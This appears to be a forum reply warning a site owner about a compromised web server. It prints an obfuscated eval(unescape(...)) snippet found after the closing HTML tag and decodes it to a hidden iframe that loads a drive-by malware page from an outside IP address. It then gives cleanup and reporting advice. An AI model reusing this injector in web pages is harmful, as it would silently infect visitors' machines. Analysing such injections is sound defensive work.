Actually, there is a small JavaScript snippet on the site that is suspicious
eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%62%34%39%34%34%34%61%64%66%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%33%30%30%30%30%29%2b%27%35%34%61%32%38%65%30%33%65%5c%27%20%77%69%64%74%68%3d%37%35%30%20%68%65%69%67%68%74%3d%34%34%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); When (safely) unescaped it shows
window.status='Done';
document.write('<iframe name="b49444adf" src="%5C%27http://58.65.232.33/gpack/index.php?%27+Math.round%28Math.random%28%29*330000%29+%2754a28e03e%5C%27" style="" none\="" height="440" width="750"></iframe>')and the server at 58.65.232.33 has a forged DNS entry, so it is likely a drive-by malware injector.
The script appears to have been inserted after the closing </html> on the page as
</html><script>eval(unescape(... I'd suggest you do two things:
1) upload a new copy of the page from your local (offline) copy to replace the page on the server.
2) if that doesn't fix the issue (do a view source and see that the script is gone), then contact your webhoster and say you have a malicious javascript appended to the end of your HTML page.
This has happened to me before when the webhoster's webserver was compromised and an unauthorized Apache mod was installed to suffix all pages with the malicious JavaScript.
Fortunately, with Firefox and NoScript, the script never ran on my system .. I was able to examine it without it invoking the downloading IFRAME.
Best regards,
Ken
BTW.. I did internet security for 10+ years and have seen this before
EDIT: It appears that all pages at
http://www.jclahr.com/ have the script after the </html> on them. The webserver is likely compromised. You should report it to the webhoster's security team.
